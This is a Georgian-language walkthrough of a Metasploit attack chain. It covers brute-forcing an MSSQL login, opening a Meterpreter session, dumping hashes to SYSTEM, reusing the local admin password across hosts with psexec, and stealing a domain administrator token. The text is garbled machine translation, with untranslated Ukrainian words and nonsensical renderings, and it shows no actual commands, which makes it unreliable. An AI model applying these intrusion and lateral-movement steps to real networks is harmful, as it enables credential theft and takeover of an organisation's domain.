კარგი, მოდით ვიმუშაოთ მონაცემთა ბაზის პოტენციურ სერვერთან.

თუ ვივარაუდებთ, რომ MSSQL DBMS იქ არის დაინსტალირებული (რადგან Windows არის...), ის მუშაობს 1433 პორტზე, რომელიც შედის სიაში. „ბრმად გადავიღებ“ და ვეცდები ტესტის ჩატარებას MSSQL DBMS-ისთვის.


როგორც ჩანს, მუშაობდა.

კარგი. მოდით შევქმნათ mssql ინსტანცია. გაშვება პორტზე 1043, SQLEXPRESS. მიმდინარე ვერსია არის 9.00.4035.00, კონსტრუქცია, რომელიც წარმოადგენს Microsoft SQL 2005 SP3. სერვისების ცხრილს რომ ვუყურებ, რა შეიცვალა იქ?

მე მივიღე: პორტი 1043 არის mssql და UDP პორტი 1433. ეს არის პორტი, რომლისთვისაც mssql ნამდვილად გამოიყენება.
ახლა ჩვენ ვიცით, რომ მონაცემთა ბაზის სერვისი მუშაობს ამ პორტზე და შეგვიძლია მოვაწყოთ უხეში ძალის შეტევა, vikory შეტევა და იგივე მეტასპლოიტი.

გთხოვთ, მიუთითოთ დისტანციური პორტის სწორი ნომერი (DBMS გვისმენს პორტში 1043), მომხმარებლის სახელი და პაროლი.

მოდით გავუშვათ და წარმატებით ვიპოვოთ პაროლი.

ᲙᲐᲠᲒᲘ. ეს არის პაროლი და ეს არის ჩვენი ბიჭის რწმუნებათა სიგელები. კრედიტების ცხრილს ბევრი რამის შეთავაზება აქვს.


ექსპლოიტის შექმნის დროა.


ჩვენ ვიცით კლიენტის სახელი, პაროლი და პორტი.


მოდით ამოვიღოთ მრიცხველის გარსი.

მოდი მოხსენება ამ სხდომაზე. დაუბრუნდით სესიების ჩამონათვალს, იქ დავამატებთ 1 სესიას.


შემდეგი, მე გაჩვენებთ სხვადასხვა მოდულის ისტორიას, რომლებიც წარმოიქმნება სისტემის მუშაობის შემდეგ.

smart _hashdump-ის გამოყენებით შეგიძლიათ დაადასტუროთ ჰეშები. მე დავაყენებ SESSIONS და GETSYSTEM პარამეტრებს.

ვიწყებ.


შესაძლოა იყოს ნაძარცვის ცხრილის განახლება.
მე მოვხსენი SYSTEM-ის პრივილეგიები და 2 ჰეში. როგორც ჩანს, არსებობს ადმინისტრატორის მოქმედი ანგარიში („localadmin“ ანგარიშს აქვს RID 500).

მოდით შევხედოთ ნაძარცვის ცხრილს.

მაგიდას აქვს 3 არომატი.

მე შევამოწმებ, რომ ეს პაროლი გამოიყენება ადმინისტრატორის მიერ სხვა სისტემებში. ყველაფერი, რაც ამ მიზნით მჭირდება, შემიძლია.

მე დავამატებ მასპინძლების სიას სერვისების ცხრილიდან (ეს ადრე შევინახეთ).


ლამათი ჰაში არ იქნება (მაგრამ იქნება?) უბრალოდ გაოცებული ვიქნები. დააყენეთ პარამეტრები BLANK_PASSWORDS და USER_AS_PASS მნიშვნელობაზე "არააზრი".

გაშვების შემდეგ ბევრი სხვა შეყვანაა. Vinovok - ადმინისტრატორს აქვს ერთი პაროლი რიგი მანქანებისთვის ზღვარზე.

ნაპოვნია კიდევ რამდენიმე სერთიფიკატი.


ავედი ადგილობრივი პაროლები Windows-ის სხვადასხვა სისტემებზე. შესაძლოა ვიკორისტვატი გამოიყენოს
psexec, წინააღმდეგ შემთხვევაში, თქვენ შეიძლება დაასრულოთ ყველა ჰოსტის სათითაოდ გავლა ხელით, მაგრამ ეს შეუძლებელია.
ექსპლოიტებში თქვენ უნდა დააყენოთ პარამეტრი - RHOST და არა RHOSTS და, შესაბამისად, არ შეგიძლიათ დააყენოთ ჰოსტების სია დაღვრილების მოსაძებნად.
მე გაჩვენებთ, თუ როგორ შეგიძლიათ ამ პროცესის ავტომატიზაცია დამატებითი სკრიპტების გამოყენებით.

ეს სკრიპტი ინტერნეტში სხვადასხვა წყაროდან გაჟონა. თქვენ შეგიძლიათ მარტივად შეცვალოთ იგი და დაამატოთ ფუნქციონირება.

დავიწყე psexec-ის გაშვება.
თუმცა, მე არ შემიძლია ამ სკრიპტის გაშვება, რადგან... აქ vikoristasya korisne navantazhennya (გადატვირთვის) Windows/meterpreter/reverse_tcp
სწორედ აქ არის პრობლემა - პორტი, რომელიც მესმის, არ შეიძლება იყოს სიმართლე. ამიტომ vikorist payload windows/meterpreter/bind_tcp.

მე გავხსნი ჩემს სკრიპტს.

ლოკალური ადმინისტრატორის მე-9 სესია და ღრუბლოვანი ანგარიში დაცულია.

ჩვენ ჯერ კიდევ ვეძებთ ჰეშებს, ახლა ამას გავაკეთებთ ტრადიციულად ხელით, ურთიერთქმედებით კანის სეანსთან და ვაყრით ჰეშებს.
გარდა ამისა, შეგიძლიათ გამოიყენოთ რწმუნებათა სიგელების შემგროვებელი მოდული. ეს მოდული მოგვცემს ჰეშებს და (რაც მნიშვნელოვანია!) ინკოგნიტო და ეძებს ფუნქციებს სიმბოლური დომენებისთვის. სამწუხაროდ, მოდული მოითხოვს, რომ ხელით გაუშვათ საკუთარი თავი, ეტაპობრივად, თითოეული კანის სესიისთვის, რადგან, რა თქმა უნდა, არ არსებობს შესაბამისი ფაილი, ასე რომ, სუნი ინახება.


ვიწყებ ჰეშებისა და ტოკენების შეგროვებას.

მე-5 და მე-6 სესიები აწარმოებენ დომენის მოქმედ ტოკენებს.

სცადეთ მოიპაროთ დომენი და voila - ჩვენ გვაქვს წვდომა იმავე დომენის ადმინისტრატორზე.

მაგალითი, რომელიც აჩვენებს Metasploit-ის შესაძლებლობებს და ამ პლატფორმის კომპონენტებს.
PS: წარმატებებს გისურვებთ დაუზიანებელ PDA-ს (!#)